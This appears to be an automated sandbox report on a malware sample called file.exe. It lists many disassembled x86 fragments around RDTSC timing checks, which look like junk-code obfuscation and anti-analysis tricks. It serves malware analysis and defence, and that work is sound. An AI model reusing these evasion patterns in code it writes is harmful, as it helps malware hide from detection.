Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 756CC0 second address: 756CEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F94990FE56Ch 0x0000000c jnc 00007F94990FE566h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 jno 00007F94990FE566h 0x0000001c jmp 00007F94990FE572h 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 756CEF second address: 756CF9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9498E4A77Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 754E53 second address: 754E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 756CF9 second address: 756D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 754E57 second address: 754E78 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F94990FE573h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70D3E9 second address: 70D3FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A77Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7574AC second address: 7574B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F94990FE566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7584DD second address: 7584E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75943F second address: 759454 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F94990FE56Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75A2B4 second address: 75A2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759454 second address: 75945A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D2D4 second address: 75D334 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F9498E4A77Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F9498E4A782h 0x00000011 nop 0x00000012 mov dword ptr [ebp+1246CAF8h], ebx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F9498E4A778h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 push 00000000h 0x00000036 add dword ptr [ebp+1244BEF7h], edx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D334 second address: 75D33E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F94990FE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C40E second address: 75C429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jnp 00007F9498E4A788h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C429 second address: 75C42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E329 second address: 75E36A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F9498E4A778h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 movzx edi, di 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jne 00007F9498E4A77Ch 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E36A second address: 75E387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75F36B second address: 75F3E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9498E4A782h 0x0000000b popad 0x0000000c nop 0x0000000d jo 00007F9498E4A77Ch 0x00000013 movzx edi, dx 0x00000016 push 00000000h 0x00000018 jmp 00007F9498E4A789h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F9498E4A778h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D5618h], edi 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 pop edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75F3E0 second address: 75F3EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F94990FE566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7603EC second address: 7603F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7603F0 second address: 7603F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D5B8 second address: 75D5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7614C0 second address: 76158A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F94990FE571h 0x00000011 jne 00007F94990FE568h 0x00000017 popad 0x00000018 nop 0x00000019 or edi, dword ptr [ebp+122D202Eh] 0x0000001f sub dword ptr [ebp+122D55E4h], ebx 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F94990FE568h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 jmp 00007F94990FE572h 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 mov ebx, dword ptr [ebp+122D382Bh] 0x00000058 mov eax, dword ptr [ebp+122D1005h] 0x0000005e mov ebx, 016AD4F1h 0x00000063 push FFFFFFFFh 0x00000065 push 00000000h 0x00000067 push eax 0x00000068 call 00007F94990FE568h 0x0000006d pop eax 0x0000006e mov dword ptr [esp+04h], eax 0x00000072 add dword ptr [esp+04h], 00000014h 0x0000007a inc eax 0x0000007b push eax 0x0000007c ret 0x0000007d pop eax 0x0000007e ret 0x0000007f nop 0x00000080 pushad 0x00000081 jmp 00007F94990FE572h 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76158A second address: 76158E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76158E second address: 761592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761592 second address: 7615B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9498E4A789h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7615B5 second address: 7615C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F94990FE56Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763595 second address: 76359A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76359A second address: 76359F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76359F second address: 7635B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007F9498E4A77Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766297 second address: 7662BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jl 00007F94990FE566h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F94990FE56Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7662BA second address: 7662D8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9498E4A776h 0x00000008 jmp 00007F9498E4A784h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7662D8 second address: 7662DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7662DD second address: 7662FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9498E4A786h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767BC8 second address: 767BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F94990FE566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76EFC8 second address: 76F005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A783h 0x00000007 jmp 00007F9498E4A784h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F9498E4A778h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop esi 0x00000017 push edi 0x00000018 jo 00007F9498E4A782h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7769CB second address: 7769E5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F94990FE56Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776AA9 second address: 776AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776AAD second address: 776AC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE56Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776AC3 second address: 776AD9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9498E4A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F9498E4A780h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776AD9 second address: 776AE8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776AE8 second address: 776AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776AEC second address: 776AFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776AFB second address: 776B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776B19 second address: 776B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776B1F second address: 776B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9498E4A783h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776B39 second address: 776B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A9B3 second address: 77A9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F9498E4A776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A9BD second address: 77A9D0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F94990FE566h 0x00000008 je 00007F94990FE566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AB01 second address: 77AB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9498E4A784h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AD84 second address: 77AD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AD8A second address: 77ADA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9498E4A785h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AF3C second address: 77AF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F94990FE566h 0x0000000a jmp 00007F94990FE578h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77AF5F second address: 77AF67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B080 second address: 77B08A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F94990FE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B1FD second address: 77B201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B201 second address: 77B205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B205 second address: 77B245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9498E4A788h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9498E4A789h 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B3B6 second address: 77B3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B3BC second address: 77B3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B3C0 second address: 77B3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77B3C4 second address: 77B3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77E2CF second address: 77E2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7816F9 second address: 781713 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9498E4A784h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FDD3 second address: 74FDD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FDD7 second address: 74FDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FF88 second address: 74FFB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F94990FE574h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74FFB8 second address: 74FFC2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9498E4A77Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750507 second address: 75050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750745 second address: 750749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750749 second address: 75074F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75098D second address: 750997 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9498E4A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750997 second address: 75099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75099D second address: 7509FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A787h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F9498E4A77Eh 0x00000011 nop 0x00000012 sbb dh, 0000006Fh 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F9498E4A778h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jnc 00007F9498E4A776h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750E0C second address: 750E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750E11 second address: 750E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9498E4A776h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f je 00007F9498E4A77Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750E28 second address: 750E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75110F second address: 751113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7305F3 second address: 7305F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781C1E second address: 781C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781C22 second address: 781C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781D62 second address: 781D6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781D6D second address: 781D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jbe 00007F94990FE566h 0x0000000f jc 00007F94990FE566h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 push edx 0x00000019 jmp 00007F94990FE577h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781D9F second address: 781DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781DA4 second address: 781DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F94990FE573h 0x00000008 jnl 00007F94990FE566h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78210A second address: 78212E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F9498E4A776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9498E4A780h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78212E second address: 782132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782279 second address: 782297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jnp 00007F9498E4A776h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F9498E4A77Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782297 second address: 78229C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
